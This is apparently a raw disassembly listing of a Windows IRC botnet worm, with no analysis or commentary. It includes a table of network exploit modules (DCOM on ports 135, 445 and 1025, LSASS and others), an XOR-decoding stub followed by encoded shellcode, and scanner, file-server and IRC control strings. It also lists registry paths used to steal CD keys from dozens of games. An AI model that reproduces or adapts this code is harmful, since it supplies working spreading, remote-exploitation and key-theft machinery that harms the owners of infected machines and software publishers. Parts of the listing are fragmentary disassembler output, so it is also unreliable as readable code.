db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_406387+AE�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_406387+79�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_406387+4B�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_406AF8+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dword_42AB14 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_406C19+493�o
dword_42AB20 dd 7A026E02h, 201F6D1Fh, 74667428h, 1F702E70h, 29671F6Ch
; DATA XREF: sub_406C19+47F�o
dd 0BBBB0220h, 74202002h, 736E6172h, 20726566h, 20206F74h
dd 20207325h, 75731F02h, 73656363h, 6C756673h, 6320796Ch
dd 6C706D6Fh, 64657465h, 202C021Fh, 6F666E69h, 2528203Ah
dd 2E2973h
unk_42AB74 db 2 ; DATA XREF: sub_406C19+3B6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileNotFoundSS db ' File not found: %s (%s).',0
dword_42ABA8 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_406C19+399�o
dword_42ABBC dd 7A026E02h, 201F6D1Fh, 74667428h, 1F702E70h, 29671F6Ch
; DATA XREF: sub_406C19+33E�o
dd 0BBBB0220h, 74202002h, 736E6172h, 20726566h, 20206F74h
dd 20207325h, 65621F02h, 6E6E6967h, 1F676E69h, 69202C02h
dd 3A6F666Eh, 73252820h, 2E29h
unk_42AC04 db 2 ; DATA XREF: sub_406C19+15A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToOpenFi db ' Failed to open file: %s.',0
unk_42AC38 db 2 ; DATA XREF: sub_406C19+6A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSocketF_2 db ' Error: socket() failed, returned: <%d>.',0
align 4
aOctet db 'octet',0 ; DATA XREF: sub_406C19+F�o
align 8
aDcom135_0 db 'dcom135',0 ; DATA XREF: sub_407767+169�o
db 2 dup(0)
aDcom135 db 'Dcom135',0 ; DATA XREF: _0:00405361�o
align 4
dd 5 dup(0)
dword_42ACB0 dd 87h ; DATA XREF: sub_407110+1E�r
; sub_40EE72+30B3�r ...
off_42ACB4 dd offset sub_402DD7 ; DATA XREF: sub_407767+1EA�r
dword_42ACB8 dd 0 ; DATA XREF: sub_402DD7+2E1�w
; sub_402DD7+2E7�r ...
dword_42ACBC dd 1 ; DATA XREF: sub_407252+1F�r
dword_42ACC0 dd 0 ; DATA XREF: sub_407252:loc_4074C3�r
aDcom445 db 'dcom445',0
dd 63440000h, 34346D6Fh, 35h, 5 dup(0)
dd 1BDh, 402DD7h, 0
dd 1, 0
aDcom1025 db 'dcom1025',0
align 2
aDcom1025_0 db 'Dcom1025',0
align 4
dd 5 dup(0)
dd 401h, 402DD7h, 0
dd 1, 0
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 403688h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0035h, 5F737361h
dd 353331h, 5 dup(0)
dd 87h, 403688h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 8Bh, 403688h, 0
dd 2 dup(1), 346E7361h, 3534h, 73610000h, 6D73316Eh, 62h
dd 5 dup(0)
dd 1BDh, 40428Fh, 0
dd 2 dup(1), 316E7361h, 3933h, 73610000h, 6D73316Eh, 746E62h
dd 5 dup(0)
dd 8Bh, 40428Fh, 0
dd 2 dup(1), 6970616Eh, 353434h, 656E0000h, 69706174h
dd 353434h, 5 dup(0)
dd 1BDh, 404F42h, 2 dup(0)
dd 1, 6970616Eh, 393331h, 656E0000h, 69706174h, 393331h
dd 5 dup(0)
dd 8Bh, 404F42h, 2 dup(0)
dd 1, 6D7973h, 0
dd 79730000h, 746E616Dh, 6365h, 5 dup(0)
dd 0B97h, 405088h, 0
dd 1, 0
dd 636874h, 0
dd 68540000h, 6C717363h, 6 dup(0)
dd 599h, 40527Eh, 0 ; CODE XREF: sub_42AF96:loc_42AFAB�j
dd 1, 10h dup(0)
; ---------------------------------------------------------------------------
jmp short loc_42AFA6
; =============== S U B R O U T I N E =======================================
sub_42AF96 proc near ; CODE XREF: sub_42AF96:loc_42AFA6�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_42AF9E: ; CODE XREF: sub_42AF96+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42AF9E
jmp short loc_42AFAB
; ---------------------------------------------------------------------------
loc_42AFA6: ; CODE XREF: _2:0042AF94�j
call sub_42AF96
loc_42AFAB: ; CODE XREF: sub_42AF96+E�j
jo short near ptr dword_42AF44+2
cwde
cdq
cdq
retn
sub_42AF96 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_407110+82�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: sub_407110+42�o
align 4
unk_42B134 db 2 ; DATA XREF: sub_407110+11�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aExploitStatist db ' Exploit Statistics:',0
align 4
unk_42B168 db 2 ; DATA XREF: sub_4071DB+42�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanNotActive_ db ' Scan not active.',0
unk_42B198 db 2 ; DATA XREF: sub_4071DB+2C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCurrentIpS_ db ' Current IP: %s.',0
align 4
unk_42B1C8 db 2 ; DATA XREF: sub_407252+36F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStartS db 'Failed to start server, error: <%d>.',0
align 4
unk_42B20C db 2 ; DATA XREF: sub_407252+307�o
; sub_40EE72+54B7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aServerListenin db 'Server listening on IP: %s:%d, Directory: %s\.',0
align 4
dword_42B258 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_407252+267�o
dd 2BBBB02h
aFailedToStar_0 db ' Failed to start server, error: <%d>.',0
align 4
dword_42B298 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_407252+1FA�o
dd 2BBBB02h
aServerStartedO db ' Server started on Port: %d, File: %s, Request: %s.',0
align 4
unk_42B2E8 db 2 ; DATA XREF: sub_407252+149�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_1 db ' Failed to start server, error: <%d>.',0
unk_42B328 db 2 ; DATA XREF: sub_407252+DB�o
; sub_40EE72+5341�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aServerStarte_0 db ' Server started on Port: %d, File: %s, Request: %s.',0
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40762E+38�o
; sub_40AEE0+46�o
unk_42B384 db 2 ; DATA XREF: sub_407767+EE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOpen db ' IP: %s, Port %d is open.',0
unk_42B3BC db 2 ; DATA XREF: sub_407767+93�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSDScanThread db ' IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 4
unk_42B408 db 2 ; DATA XREF: sub_40797F+1CE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedAtSDAf db ' Finished at %s:%d after %d minute(s) of scanning.',0
align 4
unk_42B45C db 2 ; DATA XREF: sub_40797F+173�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_2 db ' Failed to start worker thread, error: <%d>.',0
align 4
unk_42B4A8 db 2 ; DATA XREF: sub_40797F+103�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDScanThreadDS db ' %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 10h
unk_42B4F0 db 2 ; DATA XREF: sub_40797F+87�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToInitia db ' Failed to initialize critical section.',0
align 4
unk_42B538 db 2 ; DATA XREF: sub_407BDE+156�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartC db ' Failed to start client thread, error: <%d>.',0
unk_42B584 db 2 ; DATA XREF: sub_407BDE+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnecti db ' Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_42B5DC db 2 ; DATA XREF: sub_407D66+1AA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_3 db ' Failed to start connection thread, error: <%d>.',0
unk_42B62C db 2 ; DATA XREF: sub_407D66+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnec_0 db ' Client connection to IP: %s:%d, Server thread: %d.',0
align 10h
unk_42B680 db 2 ; DATA XREF: sub_407FEA+1B2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStar_4 db 'Failed to start server on Port %d.',0
align 10h
unk_42B6C0 db 2 ; DATA XREF: sub_407FEA+18F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStar_5 db 'Failed to start client thread, error: <%d>.',0
unk_42B708 db 2 ; DATA XREF: sub_407FEA+114�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aClientConnec_1 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_42B75C db 2 ; DATA XREF: sub_407FEA+A8�o
; sub_40EE72+5E20�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aServerStarte_1 db 'Server started on: %s:%d.',0
align 4
unk_42B794 db 2 ; DATA XREF: sub_4081EF+1F9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorFailedToC db 'Error: Failed to connect to target, returned: <%d>.',0
unk_42B7E4 db 2 ; DATA XREF: sub_4081EF+18A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorFailedToO db 'Error: Failed to open socket(), returned: <%d>.',0
unk_42B830 db 2 ; DATA XREF: sub_4081EF+F2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aAuthentication db 'Authentication failed. Remote userid: %s != %s.',0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_4085B3+11�o
aWindow db 'Window',0 ; DATA XREF: sub_4087EE+23�o
; sub_4089E7+26�o
align 10h
dd 80000001h
off_42B894 dd offset aSoftwareValveC ; DATA XREF: sub_408C26+C�r
; sub_408C26+21�o
; "Software\\Valve\\CounterStrike\\Settings"
; ---------------------------------------------------------------------------
push 500042CAh
retf 42h
; ---------------------------------------------------------------------------
dword_42B8A0 dd 2 dup(0) ; DATA XREF: sub_408C26+26�o
dd 80000001h, 42CA28h, 42CA1Ch, 42CA0Ch, 2 dup(0)
dd 80000001h, 42C9ECh, 42C9E8h, 42C9D4h, 2 dup(0)
dd 80000001h, 42C9B0h, 42C9E8h, 42C9A4h, 2 dup(0)
dd 80000001h, 42C980h, 42C978h, 42C964h, 2 dup(0)
dd 80000001h, 42C950h, 42C940h, 42C924h, 2 dup(0)
dd 80000001h, 42C8E0h, 42CA68h, 42C8CCh, 2 dup(0)
dd 80000002h, 42C8A0h, 42C894h, 42C874h, 2 dup(0)
dd 80000002h, 42C840h, 42CA68h, 42C828h, 2 dup(0)
dd 80000002h, 42C7F4h, 42CA68h, 42C7DCh, 2 dup(0)
dd 80000002h, 42C7C4h, 42CA68h, 42C7ACh, 2 dup(0)
dd 80000002h, 42C770h, 43C80Ch, 42C760h, 2 dup(0)
dd 80000002h, 42C728h, 43C80Ch, 42C714h, 2 dup(0)
dd 80000002h, 42C6C8h, 43C80Ch, 42C6A8h, 2 dup(0)
dd 80000002h, 42C658h, 43C80Ch, 42C62Ch, 2 dup(0)
dd 80000002h, 42C5F0h, 43C80Ch, 42C5DCh, 2 dup(0)
dd 80000002h, 42C5A4h, 43C80Ch, 42C594h, 2 dup(0)
dd 80000002h, 42C544h, 43C80Ch, 42C518h, 2 dup(0)
dd 80000002h, 42C4D8h, 43C80Ch, 42C4BCh, 2 dup(0)
dd 80000002h, 42C48Ch, 43C80Ch, 42C46Ch, 2 dup(0)
dd 80000002h, 42C430h, 43C80Ch, 42C41Ch, 2 dup(0)
dd 80000002h, 42C3D4h, 43C80Ch, 42C3B4h, 2 dup(0)
; ---------------------------------------------------------------------------
add al, [eax]
add ds:byte_42C360[eax], al
or al, 0C8h
inc ebx
add [eax], dh
retn
; ---------------------------------------------------------------------------
dw 42h
dd 2 dup(0)
dd 80000002h, 42C2E0h, 43C80Ch, 42C2B4h, 2 dup(0)
dd 80000002h, 42C274h, 42C26Ch, 42C24Ch, 2 dup(0)
dd 80000002h, 42C208h, 43C80Ch, 42C1ECh, 2 dup(0)
dd 80000002h, 42C1A0h, 43C80Ch, 42C17Ch, 2 dup(0)
dd 80000002h, 42C148h, 43C80Ch, 42C13Ch, 2 dup(0)
dd 80000002h, 42C108h, 43C80Ch, 42C0FCh, 2 dup(0)
dd 80000002h, 42C0C8h, 43C80Ch, 42C0BCh, 2 dup(0)
dd 80000002h, 42C088h, 43C80Ch, 42C07Ch, 2 dup(0)
dd 80000002h, 42C040h, 43C80Ch, 42C02Ch, 2 dup(0)
dd 80000002h, 42BFF0h, 43C80Ch, 42BFDCh, 2 dup(0)
dd 80000002h, 42BFACh, 42CA68h, 42BF90h, 2 dup(0)
dd 80000002h, 42BF70h, 42BF68h, 42BF44h, 2 dup(0)
dd 80000002h, 42BF28h, 42BF68h, 42BF08h, 2 dup(0)
dd 80000002h, 42BEE8h, 42BF68h, 42BEC4h, 2 dup(0)
dd 80000002h, 42BEACh, 42BF68h, 42BEA8h, 2 dup(0)
dd 80000002h, 42BE8Ch, 42BE7Ch, 42BE74h, 2 dup(0)
dd 80000002h, 42BE40h, 42BE3Ch, 42BE24h, 2 dup(0)
dd 80000002h, 42BDE8h, 42BDDCh, 42BDB4h, 42BDA4h, 42BD90h
dd 80000002h, 42BD6Ch, 42BD60h, 42BD4Ch, 42BD3Ch, 42BD34h
dd 80000002h, 42BD6Ch, 42BD60h, 42BD08h, 42BD3Ch, 42BD00h
dd 80000002h, 42BD6Ch, 42BD60h, 42BCD0h, 42BD3Ch, 42BCC8h
dd 6 dup(0)
dd 3379654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64726F48h, 6F207365h, 68742066h, 6E552065h
dd 64726564h, 296B7261h, 0
dd 3279654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64616853h, 2073776Fh, 5520666Fh, 6572646Eh
dd 6469746Eh, 2965h, 3179654Bh, 3Dh, 636E776Eh, 79656B64h
dd 696E692Eh, 0
aNeverwinterNig db 'Neverwinter Nights',0
align 10h
aLocation db 'Location',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 10h
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aBaseMpSof2key db 'base\mp\sof2key',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
db 53h
aOftwareActivis db 'oftware\Activision\Soldier of Fortune II - Double Helix',0
align 4
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 4
aKey db 'key',0 ; DATA XREF: _2:004312F0�o
db 53h
aOftwareIllusio db 'oftware\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aChrome db 'Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
db 53h
aOftwareTechlan db 'oftware\Techland\Chrome',0
align 4
aNox db 'NOX',0
aSoftwareWestwo db 'Software\Westwood\NOX',0
align 4
aCommandAndConq db 'Command and Conquer: Red Alert 2',0
align 4
db 53h
aOftwareWestwoo db 'oftware\Westwood\Red Alert 2',0
align 4
aCommandAndCo_0 db 'Command and Conquer: Red Alert',0
align 4
db 53h
aOftwareWestw_0 db 'oftware\Westwood\Red Alert',0
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 4
aSerial db 'Serial',0
align 10h
db 53h
aOftwareWestw_1 db 'oftware\Westwood\Tiberian Sun',0
align 10h
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
db 53h
aOftwareRedStor db 'oftware\Red Storm Entertainment\RAVENSHIELD',0
align 4
aNascarRacing20 db 'Nascar Racing 2003',0
align 10h
db 53h
aOftwareElectro db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2002',0
align 10h
db 53h
aOftwareElect_0 db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 4
db 53h
aOftwareElect_1 db 'oftware\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 4
db 53h
aOftwareElect_2 db 'oftware\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 4
db 53h
aOftwareElect_3 db 'oftware\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 4
db 53h
aOftwareElect_4 db 'oftware\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 10h
db 53h
aOftwareElect_5 db 'oftware\Electronic Arts\EA GAMES\Shogun Total War - Warlord Editi'
db 'on\ergc',0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
db 53h
aOftwareElect_6 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Underground\ergc',0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 4
aErgc db 'ergc',0
align 4
db 53h
aOftwareElect_7 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0
align 10h
db 53h
aOftwareElect_8 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Sp'
db 'earhead\ergc',0
align 10h
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 10h
byte_42C360 db 53h ; DATA XREF: _2:0042BAA2�w
aOftwareElect_9 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Br'
db 'eakthrough\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0
align 4
db 53h
aOftwareElec_10 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\er'
db 'gc',0
align 4
aGlobalOperatio db 'Global Operations',0
align 10h
db 53h
aOftwareElec_11 db 'oftware\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 4
aCommandAndCo_2 db 'Command and Conquer: Generals',0
align 4
db 53h
aOftwareElec_12 db 'oftware\Electronic Arts\EA GAMES\Generals\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 4
db 53h
aOftwareElec_13 db 'oftware\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0
align 4
db 53h
aOftwareElec_14 db 'oftware\Electronic Arts\EA GAMES\Command and Conquer Generals Zer'
db 'o Hour\ergc',0
align 4
aBlackAndWhite db 'Black and White',0
db 53h
aOftwareElec_15 db 'oftware\Electronic Arts\EA GAMES\Black and White\ergc',0
align 4
aBattlefieldVie db 'Battlefield Vietnam',0
db 53h
aOftwareElec_16 db 'oftware\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 4
aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 4
db 53h
aOftwareElec_17 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons '
db 'of WWII\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
db 53h
aOftwareElec_18 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rom'
db 'e\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942',0
align 4
db 53h
aOftwareElec_19 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aFreedomForce db 'Freedom Force',0
align 10h
db 53h
aOftwareElec_20 db 'oftware\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
db 53h
aOftwareIgi2Ret db 'oftware\IGI 2 Retail',0
align 4
aUnrealTourname db 'Unreal Tournament 2004',0
align 4
db 53h
aOftwareUnrealT db 'oftware\Unreal Technology\Installed Apps\UT2004',0
align 4
